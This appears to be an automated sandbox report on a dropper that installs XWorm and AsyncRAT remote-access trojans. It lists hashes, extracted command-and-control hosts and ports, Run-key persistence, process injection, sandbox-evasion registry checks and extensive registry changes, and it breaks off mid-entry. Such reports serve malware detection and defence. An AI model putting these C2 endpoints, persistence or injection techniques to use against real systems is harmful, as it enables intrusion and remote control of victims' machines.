Analysis
-
max time kernel
86s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
22-06-2024 05:33
Static task
static1
Behavioral task
behavioral1
Sample
Dropper.exe
Resource
win7-20240508-en
General
-
Target
Dropper.exe
-
Size
1.4MB
-
MD5
19b0c113a289ffdac673f5746be14b9d
-
SHA1
5a6f5fa38916a6058c88d5f45fc37f89872c0cb9
-
SHA256
24e5bb5ab34a162b750abc2d8a38a48afceee92fc256f2a2fc3ff49f327fbf4a
-
SHA512
253d62161d97ad83ba272a1e749a8cbfda51bf7b2e2825d98e41039208fc22b1f91315a0e8c6ee84d3c6b4e6f2867bf64e7bb53bb77384ab6a3340338896806e
-
SSDEEP
12288:w8w1hc0Q53LOAGkjwtBx5n4AYakafNh/2mPj/YDLm7GylDULvEd8oK/mngAmgIv:wjmwDtPjwuB
Malware Config
Extracted
xworm
politics-fiber.gl.at.ply.gg:47430
-
Install_directory
%AppData%
-
install_file
$77-scchost.exe
Extracted
asyncrat
Default
environmental-blank.gl.at.ply.gg:25944
-
delay
1
-
install
true
-
install_file
$77-aachost.exe
-
install_folder
%AppData%
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe family_xworm behavioral2/memory/3924-65-0x0000000000FD0000-0x0000000000FE2000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4344 created 612 4344 powershell.EXE winlogon.exe -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe family_asyncrat -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Dropper.exe$77-sdchost.exe$77-aachost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Dropper.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation $77-sdchost.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation $77-aachost.exe -
Executes dropped EXE 9 IoCs
Processes:
$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-install.exe$77-aachost.exe$77-sdchost.exe$77-aachost.exe$77-penisballs.exe$77-scchost.exepid process 3924 $77-sdchost.exe 1428 $77-aachost.exe 3408 $77-penisballs.exe 4936 $77-install.exe 2884 $77-aachost.exe 2348 $77-sdchost.exe 508 $77-aachost.exe 3484 $77-penisballs.exe 6112 $77-scchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
$77-sdchost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" $77-sdchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Drops file in System32 directory 18 IoCs
Processes:
svchost.exesvchost.exepowershell.EXE$77-aachost.exeOfficeClickToRun.exesvchost.exe$77-sdchost.exe$77-penisballs.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe $77-aachost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.log $77-aachost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe $77-sdchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf $77-penisballs.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4344 set thread context of 5048 4344 powershell.EXE dllhost.exe -
Drops file in Windows directory 1 IoCs
Processes:
TiWorker.exedescription ioc process File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mousocoreworker.exewmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 4640 timeout.exe 5968 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
wmiprvse.exemousocoreworker.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEsvchost.exe$77-sdchost.exe$77-penisballs.exeOfficeClickToRun.exedllhost.exesvchost.exemousocoreworker.exe$77-aachost.execmd.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02lqhbjzhmxrntbl svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" $77-sdchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" dllhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02jeqxnbeyclbjuq\Provision Saturday, June 22, 2024 05:34:35 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAADvlPz4sD+UqC1ABcBbogZwAAAAACAAAAAAAQZgAAAAEAACAAAADwugV2nk2+hWVhldFdYmgoJqG7KJICQoYKRccsZquz4AAAAAAOgAAAAAIAACAAAAAn6QjP63ACXkKrjZCaDtZJUBEA+QforPSHo+h0LBTPXCAAAAAZGq35+3S9+Mw3rn7AF+RCb+QxsA4GdwgQp2QxrpTxakAAAAA3X7WGsMoR4a8ycb81fq1nZF5L7D9C7dxIc6Xll+ReZ9kuxcV4noVfocZ7O8f6I50+RFrZFFuZ3XTI/HftS1Yw" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 40c7a47b819ecf1199d300aa004ae837ac0000005d54a9a2c2a0b4429708a0b2badd77c89d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates $77-penisballs.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 40c7a47b819ecf1199d300aa004ae837ac0000005d54a9a2c2a0b4429708a0b2badd77c89d0000006024b221ea3a6910a2dc08002b30309d9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 40c7a47b819ecf1199d300aa004ae837ac0000005d54a9a2c2a0b4429708a0b2badd77c89d0000006024b221ea3a6910a2dc08002b30309d9d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft $77-penisballs.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E61BF828-5E63-4287-BEF1-60B1A4FDE0E3} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000b0fb63db65c4da01 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02jeqxnbeyclbjuq svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ $77-aachost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000003a357edb65c4da01 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02bfvfrvzcpvfgof svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople $77-penisballs.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached cmd.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 40c7a47b819ecf1199d300aa004ae837ac0000005d54a9a2c2a0b4429708a0b2badd77c89d0000006024b221ea3a6910a2dc08002b30309dbc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 dllhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" dllhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" $77-aachost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000047856ddb65c4da01 dllhost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{99D353BC-C813-41EC-8F28-EAE61E702E57} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 010000000000000047856ddb65c4da01 dllhost.exe -
Modifies registry class 64 IoCs
Processes:
Explorer.EXEDropper.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).x = "4294967295" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).y = "4294967295" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "663" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "3" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 Explorer.EXE Set value (data) 